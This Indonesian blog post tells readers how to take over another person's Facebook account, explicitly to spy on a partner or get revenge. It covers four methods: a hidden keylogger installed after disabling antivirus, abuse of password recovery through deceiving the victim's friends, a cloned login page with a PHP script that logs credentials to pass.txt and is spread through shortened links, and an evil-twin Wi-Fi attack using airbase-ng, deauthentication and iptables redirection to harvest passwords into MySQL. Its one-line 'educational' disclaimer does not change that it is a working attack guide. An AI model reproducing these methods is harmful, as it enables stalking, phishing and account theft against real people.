Chat am sapa ya si dia, da punya pacar blom ya, atau modus operandi berpura menyelamatkan akun sang gadis padahal anda pelakunya, begitulah demi cinta segala cara dilakukan bahkan balas dendam ( Revenge )
- Menggunakan KeyLoger Download
Yap sapa yang ga kenal Keyloger, merupakan aplikasi yang dapat merekam aktifitas yang dilakukan keyboard, Tinggal Instal dan mode spy/hidden, Jangan lupa matikan dulu antivirus yang aktif, Pasang ini dikomputer korban, begitu membuka Facebook maka login korban langsung terekam diKeyloger, anda tinggal melihat dihistory/log, Catat setelah itu unistal kembali keylogger bgitu juga aktifkan kembali antivirusnya - Mengunakan Fitur Lupa PasswordYang perlu kamu ketahui adalah email korban dengan melihat diprofile atau menanyakan langsung pada korban, buka Facebook kemudian lupa kata sandi dan masukkan email korban
Gbr.1
Kemudian anda disuru mengisi kontak email atau telpon yang bisa dihibungi Facebook,
isikan dengan email anda atau email baru lebih baik jaga2 mantan atau pacar anda nyewa detektif :),
Gbr.2
Jika anda bisa menjawab pertanyaan keamanannya, password korban akan langsung terkirim ke email anda, tapi jika anda tidak bisa menjawabnya lebih baik klik "pulihkan dengan bantuan teman" dan facebook akan memberikan 3 pilihan teman yang kemudian mengirimkan kode untuk membuka Facebook korban
Gbr.3
ditahap ini tinggal teknik anda untuk meyakinkan teman korban untuk menanyakan kodenya,
setelah anda dapat kodenya, masukkan ketiganya pada kolom tersedia dan hasilnya cring cring,,, - Menggunakan FAKE LOGIN
Fake login adalah membuat tampilan yang serupa dengan web supaya tidak diketahui korban, dan ketika memasukkan login maka password korban akan terekam kedalam hostingan yang disediakan pelaku.
Siapkan hosting bisa di Hostinger.co.id, Niagahoster atau hosting yang lain,
1. Koneksi Internet2. Masuk ke http://www.facebook.com/login.php/3. Klik kanan, pilih save as atau save page as4. Lalu anda akan memiliki file yang bernama “Log in Facebook.htm” dan folder berupa kumpulan file yang bernama “Log in Facebook_Files”5. Pada file ”Log in Facebook.htm” klik kanan, open in notepad lalu ganti kode <div><form id=”login_form” action=”https://www.facebook.com/login.php?login_attempt=1″method=”post” menjadi <div><form id=”login_form” action=””next.php method=”post” untuk menemukannya, cukup dengan “ctrl+f” (find) dan jangan lupa di save6. Anda harus memiliki hosting dan domain terlebih dahulu. Jika saya menggunakan 000webhost.com dengan url yang telah diberikan dari 000webhost (lebih detil cari cara bagaimana membuat sebuah web)7. Upload file ”Log in Facebook.htm” lalu ganti nama dengan nama apa saja yang anda inginkan namun jangan tertera kata “facebook”8. Upload file yang ada di “Log in Facebook_Files” ke hosting yang sudah kamu buat9. Buat php script dengan nama “next.php” dengan notepad, kemudian ganti extention dari .txt menjadi .php (yang harus anda isi akan saya berikan di bawah) kemudian upload ke hosting tempat dimana anda menaruh file dengan extention .htm tadi.10. Good Job! sekarang tinggal berikan URL fake login tersebut ke teman anda atau sebarkan secara random dengan embel-embel aplikasi baru atau cara baru login di facebook. Atau jika mau lebih menipu, gunakan URL shortner seperti bit.ly atau tinyurl.Jika berhasil, maka di tempat dimana anda mengupload file tadi akan tebuat file baru bernama pass.txt yang berisikan email dan password si target. Ini dia fake user interface yang telah saya buat http://facesbook.site11.com/New%20Log%20In.htmscript next.php<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
ATTETION: Artikel ini hanya bersifat edukasi, nilai yang didapat adalah jangan sekali-kali login dari url selain facebook.com. Sorry for no picture buat tutorialnya. Salam. - Menggunakan Evil TwinCara kerjanya sebenarnya kita menduplikat wifi target dan mengarahkan serta memaksa user wifi target untuk login dengan wifi palsu buatan kita yang kita buat percis dengan wifi target.Bahan bahan yang dibutuhkan sudah saya cantumkan di link bawah dari tutorial ini, anda bisa mendownloadnya dari sana. Untuk file download itu anda letakkan di file system – var – www. Ingat !, filenya yang anda letakkan disana, bukan foldernya. File arminaven.sh anda letakkan di root.Yang diperlukan adalah1. Operating system linux (backtrack), saya menggunakan backtrack 5 R12. Database dengan nama dan tabel.3. dhcp3-server4. Apache, untuk menjalankan halaman login kita5. Mysql, untuk menyimpan inputan user sebagai hasil dari usaha kita6. Sudah terkoneksi ke sebuah Hospot (wifi) yang internet access, untuk mendapatkan IP
Langkah langkahnya adalah sebagai berikut:Aktifkan apacehe dan mysql kita. Tepatnya di :Aplication – backtrack – services – httpd – start apacheAplication – backtrack – services – mysql - start mysqlMasuk ke mysql dengan mengetik di konsole:Mysql – root –p dan enter, password standarnya adalah toor, Selanjutnya Buat database dengan nama database “arminaven”, nama tabel “wifi”, kebetulan saya membuat dua halaman login sekaligus, jadi dalam database “arminaven” kita buat lagi tabel dengan nama “facebook”. Berikut caranya:Masuk dulu kecreate database arminaven;use arminaven;create table wifi(username VARCHAR(64), wifi_name VARCHAR(64), wifi_password VARCHAR(64), wifi_password_confirmation VARCHAR(64));use arminaven;create table facebook(username VARCHAR(64), password VARCHAR(64));setelah kita buat database, kita selanjutnya menginstal dhcp3-server dengan syntak berikut ini:apt-get install dhcp3-server -yselanjutnya kita edit dengan cara berikut ini:gedit /etc/dhcp3/dhcpd.confisikan dengan berikut ini:ddns-update-style ad-hoc;default-lease-time 600;max-lease-time 7200;subnet 192.168.1.128 netmask 255.255.255.128 {option subnet-mask 255.255.255.128;option broadcast-address 192.168.1.255;option routers 192.168.1.129;option domain-name-servers 8.8.8.8;range 192.168.1.130 192.168.1.140;}Oya, hampri lupa, sebelumnya kita telah menentukan target yang akan kita duplikat, jika belum tau cara melihat wifi yang ada, anda bisa melihatnya dengan mengetik syntak:Airmon-ng start wlan0Airodump-ng mon0Anda akan melihat wifi yang ada, dan catat wifi yang akan anda dupikat, yaitu chanelnya, bssidnya. Cukup itu aja, selanjutnya matikan interface anda dengan cara berikut:airmon-ng stop mon0airmon-ng stop wlan0selanjutnya kita mulai menduplikat wifi,gini caranya:airmon-ng start wlan0 1angka 1 merupakn chanel kita, kita sesuaikan dengan target yang kita duplikat, lalu dilanjutkan dengan membuat wifi palsu kita.airbase-ng -e "Arminaven" -c 1 mon0disini saya membuat wifi dengan nama saya “arminaven”, sebenarnya nama wifi yang kita buat adalah sesuai dengan nama target wifi yang akan jadi eksperimen kita. Wifi kita akan terlihat di PC user jika sinyal wifi kita sampai ke PC nya, jadi ukuran nampak enggaknya wifi kita juga di tentukan oleh kewalitas radius wifi bawaan PC kita, bisa dipahami maksud ane kannnn???Kita lanjutkan ke tahap selanjutnya. Setelah dhcp3-server kita install dan atur sesuai dengan yang diatas, selanjutnya kita buat pengaturan seperti berikut untuk mengarahkan user ke halaman login kita saat mengakses situs apa aja, misalnya google.com, facebook.com dan lain sebagainya. Yang pasti harus pakewww.namasitu.com dechhh..kalo gak dibuat begitu. Akan ada pemberitahuan error di pc user, moga moga ja user mengunjungi situs tertentu J.Kembali lagi ke topik permasalan, jadi untuk mengarahkan user ke halaman login kita, maka kita atur agar user mengakses IP kita. Kita buat dulu sebuah file dengan nama ekstensi *.sh. kebetulan yang ane buat namanya arminaven.sh yang dapat anda lihat di file download di bawah. Dalam file arminaven.sh tersebut berisi kode berikut ini:#!/bin/bashifconfig at0 upifconfig at0 192.168.1.129 netmask 255.255.255.128route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainiptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADEiptables --append FORWARD --in-interface at0 -j ACCEPTecho "1" > /proc/sys/net/ipv4/ip_forwardiptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.5:80iptables -t nat -A POSTROUTING -j MASQUERADE/etc/init.d/dhcp3-server startYang perlu anda ganti hanyalah 192.168.1.5 karena itu adalah IP saya dengan koneksi ke sebuah wifi dengan interface wlan0 , anda tinggal menggantinya dengan IP anda, saya yakin sudah tahu cara melihat Ipnya, kalo ada yang belum tahu, coba ketik ifconfig maka akan muncul IP anda jika anda sudah konek. jika anda menggunakan koneksi selain wifi saya tidak tahu bagaimana pengaturannya, begitu juga jika anda menggunakan koneksi dengan modem. Tapi bagi yang sudah pernah melakukanna, silahkan share di kolom komentar J. Oyaaa, file arminaven.sh ini kita letakkan di ROOT, atau homenya backtrack. Setelah kita letakkan disana, maka kita mulai menjalankan file tersebut dengan cara membuka konsole baru dan ketik:Bash arminaven.shMaka dhcp3-server kita akan di jalankan dan kita melangkah ke tahap pemaksaa user mengakses wifi siluman kita J J.Sudah tahu belum caranya???. Kita tinggal melakukan aireplay-ng. Lengkapnya gini aja dehAirodump-ng mon0Setelah muncul hospot yang ada, termasuk wifi siluman kita, maka yang perlu kita gunakan adalah bssid target kita dengan kliennya. Umpamanya bssidnya 00:01:12:23:34:45 dan kliennya A1:2B:5A:D4:2C:11 maka kita aireplay dengan cara berikutAireplay-ng -0 0 –e 00:01:12:23:34:45 –c A1:2B:5A:D4:2C:11 mon0Maka user akan terputus, saat dia mencoba mengkonekkan ke wifi kita, maka saat dia mengakses situs akan di arahkan ke halaman login wifi kita, dan tentunya tinggal manen aja kita nantinya, namun yang perlu di perhatikan adalah, KONEKSI KITA JANGAN SAMPAI PUTUS. Karena user sebenarnya mengakses IP kita.Kita anggap user sudah mengakses wifi kita sekarang kita masuk ke database kita, caranya seperti diatas, lebih lengkapnya gini aja dech:Mysql –u root –pShow databases;Use arminaven;Show tables;Select * from wifi;Entar disana kita lihat hasilnya, jika user terkecoh, boleh jadi dia juga mengkases facebook palsu kita, untuk memastikannya kita periksa aja database kita:Show tables;Select *from facebook;Tarrraaaaa...!!!!
No comments:
Post a Comment